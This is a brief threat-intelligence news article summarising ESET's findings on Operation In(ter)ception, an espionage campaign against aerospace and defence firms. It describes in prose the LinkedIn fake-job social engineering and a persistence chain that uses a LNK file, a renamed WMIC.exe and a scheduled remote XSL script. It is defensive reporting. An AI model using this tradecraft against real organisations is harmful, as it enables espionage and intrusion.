ESET: A threat actor, maybe North Korea’s Lazarus, targeted high-profile aerospace and military companies with Operation In(ter)ception. The attackers exploited custom malware, open source tools, fake jobs and social engineering via LinkedIn, to compromise and spy the targets
Operation In(ter)ception it’s the name of a cyber espionage campaign that hit high-profile aerospace and military companies in Europe and the Middle East. It has been discovered by ESET cyber security experts. To compromise the victims, the attackers used social engineering via LinkedIn, hiding behind the ruse of attractive, but bogus, job offers. Having established an initial foothold, they deployed their custom, multistage malware, along with modified open-source tools. Furthermore, the threat actor made use of living off the land tactics, abusing legitimate tools and OS functions. Several techniques were exploited to avoid detection, including code signing, regular malware recompilation and impersonating legitimate software and companies. The primary goal was espionage. However, in one of the cases, the attackers attempted to monetize access to a victim’s email account through a BEC as the final stage of the operation. While there aren’t strong evidence connecting the attacks to a known threat actor, there are several hints suggesting a possible link to the North Korea’s Lazarus (including similarities in targeting, development environment, and anti-analysis techniques used).
How the initial compromise phase works according to the cyber security experts
According the cyber security experts, as part of the initial compromise phase, the Operation In(ter)ception attackers created fake LinkedIn accounts posing as HR representatives of well-known companies in the aerospace and defense industries. With the profiles set up, they sought out employees of the targeted companies and messaged them with fictitious job offers using LinkedIn’s messaging feature to snuck malware into the conversation, masqueraded as documents related to the job offer in question. The file was a password-protected RAR archive containing a LNK file. If opened, it started a Command Prompt that opened a remote PDF file in the target’s default browser. This, seemingly containing salary information for the reputed job positions, in reality served as a decoy. In the background, the Command Prompt created a new folder and copied the WMI Commandline Utility (WMIC.exe) to this folder, renaming the utility in the process. Finally, it created a scheduled task, set to execute a remote XSL script periodically via the copied WMIC.exe. This enabled the cyber espionage actors to get their initial foothold inside the targeted company and gain persistence on the compromised computer.